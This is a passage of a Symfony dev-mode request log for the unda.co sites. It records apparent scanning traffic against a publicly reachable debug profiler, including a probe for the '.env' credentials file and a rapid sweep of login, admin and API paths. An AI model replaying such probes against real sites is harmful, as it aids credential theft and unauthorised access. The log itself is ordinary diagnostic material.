  2217. [2025-12-17 09:10:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2218. [2025-12-17 09:16:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4?panel=request","method":"GET"} []
  2219. [2025-12-17 09:16:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2220. [2025-12-17 09:24:20] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2221. [2025-12-17 09:24:22] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  2222. [2025-12-17 09:24:22] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  2223. [2025-12-17 09:24:22] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2224. [2025-12-17 09:24:22] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2225. [2025-12-17 09:24:22] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2226. [2025-12-17 09:24:22] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2227. [2025-12-17 09:24:22] security.DEBUG: Calling Authentication entry point. [] []
  2228. [2025-12-17 09:24:23] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  2229. [2025-12-17 09:24:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=162.243.172.59&limit=10","method":"GET"} []
  2230. [2025-12-17 09:24:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=162.243.172.59&limit=10","method":"GET"} []
  2231. [2025-12-17 09:24:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4?panel=config","method":"GET"} []
  2232. [2025-12-17 09:24:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2233. [2025-12-17 09:25:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb6686","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb6686?panel=cache","method":"GET"} []
  2234. [2025-12-17 09:25:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2235. [2025-12-17 09:31:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4?panel=security","method":"GET"} []
  2236. [2025-12-17 09:31:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2237. [2025-12-17 09:38:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4?panel=twig","method":"GET"} []
  2238. [2025-12-17 09:38:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2239. [2025-12-17 09:43:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2240. [2025-12-17 09:43:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  2241. [2025-12-17 09:43:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  2242. [2025-12-17 09:43:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2243. [2025-12-17 09:43:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2244. [2025-12-17 09:43:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2245. [2025-12-17 09:43:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2246. [2025-12-17 09:43:27] security.DEBUG: Calling Authentication entry point. [] []
  2247. [2025-12-17 09:44:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=82.180.146.199&limit=10","method":"GET"} []
  2248. [2025-12-17 09:44:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=82.180.146.199&limit=10","method":"GET"} []
  2249. [2025-12-17 09:45:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9727b6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9727b6?panel=swiftmailer","method":"GET"} []
  2250. [2025-12-17 09:45:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  2251. [2025-12-17 09:45:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4?panel=time","method":"GET"} []
  2252. [2025-12-17 09:45:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2253. [2025-12-17 09:49:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2254. [2025-12-17 09:53:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4","method":"GET"} []
  2255. [2025-12-17 09:53:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2256. [2025-12-17 09:57:44] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2257. [2025-12-17 09:58:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?ip=176.65.148.43&limit=10&url=https%3A%2F%2Funda.co%2F.env","method":"GET"} []
  2258. [2025-12-17 09:58:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=176.65.148.43&limit=10&url=https%3A%2F%2Funda.co%2F.env","method":"GET"} []
  2259. [2025-12-17 09:59:45] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2260. [2025-12-17 09:59:45] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  2261. [2025-12-17 09:59:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47?panel=twig","method":"GET"} []
  2262. [2025-12-17 09:59:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2263. [2025-12-17 10:01:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2264. [2025-12-17 10:01:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  2265. [2025-12-17 10:01:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /formaction"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /formaction\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2266. [2025-12-17 10:01:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/auth/signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/auth/signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2267. [2025-12-17 10:02:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/auth/callback"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/auth/callback\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2268. [2025-12-17 10:02:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /auth/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /auth/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2269. [2025-12-17 10:02:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /auth/signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /auth/signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2270. [2025-12-17 10:02:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2271. [2025-12-17 10:02:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2272. [2025-12-17 10:02:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /dashboard"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /dashboard\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2273. [2025-12-17 10:02:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /admin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /admin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2274. [2025-12-17 10:02:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /account"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /account\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2275. [2025-12-17 10:02:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /profile"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /profile\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2276. [2025-12-17 10:02:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /settings"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /settings\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2277. [2025-12-17 10:02:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/user"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/user\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2278. [2025-12-17 10:02:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/profile"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/profile\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2279. [2025-12-17 10:02:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2280. [2025-12-17 10:02:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /submit"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /submit\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2281. [2025-12-17 10:02:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /owa/auth/logon.aspx"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /owa/auth/logon.aspx\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2282. [2025-12-17 10:03:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"879f21","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/879f21","method":"GET"} []
  2283. [2025-12-17 10:03:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  2284. [2025-12-17 10:05:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47?panel=time","method":"GET"} []
  2285. [2025-12-17 10:05:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2286. [2025-12-17 10:12:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47?panel=request","method":"GET"} []
  2287. [2025-12-17 10:12:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2288. [2025-12-17 10:18:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47?panel=config","method":"GET"} []
  2289. [2025-12-17 10:18:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2290. [2025-12-17 10:32:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2291. [2025-12-17 10:32:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2292. [2025-12-17 10:39:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0a83b4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0a83b4","method":"GET"} []
  2293. [2025-12-17 10:39:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  2294. [2025-12-17 10:43:57] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"622f73","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/622f73/search/results?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
  2295. [2025-12-17 10:43:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
  2296. [2025-12-17 10:45:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee3c72","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee3c72?panel=twig","method":"GET"} []
  2297. [2025-12-17 10:45:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2298. [2025-12-17 10:49:43] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2299. [2025-12-17 10:54:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=twig","method":"GET"} []
  2300. [2025-12-17 10:54:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2301. [2025-12-17 10:57:08] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2302. [2025-12-17 11:06:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"577b2c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/577b2c?panel=events","method":"GET"} []
  2303. [2025-12-17 11:06:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  2304. [2025-12-17 11:19:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
